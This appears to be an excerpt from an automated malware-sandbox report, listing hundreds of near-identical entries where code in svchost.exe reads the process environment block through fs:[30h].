                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h] 2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938550 mov eax, dword ptr fs:[00000030h] 2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396656A mov eax, dword ptr fs:[00000030h] 2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h] 2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039364AB mov eax, dword ptr fs:[00000030h] 2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h] 2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968402 mov eax, dword ptr fs:[00000030h] 2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h] 2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h] 2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h] 2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h] 2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392645D mov eax, dword ptr fs:[00000030h] 2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395245A mov eax, dword ptr fs:[00000030h] 2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h] 2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h] 2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h] 2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h] 2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h] 2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h] 2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h] 2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h] 2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h] 2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h] 2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h] 2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h] 2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h] 2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h] 2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h] 2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h] 2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h] 2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h] 2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h] 2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h] 2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h] 2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h] 2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h] 2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h] 2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h] 2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h] 2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h] 2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h] 2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h] 2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h] 2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h] 2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h] 2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h] 2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h] 2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h] 2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h] 2_2_039B89B3
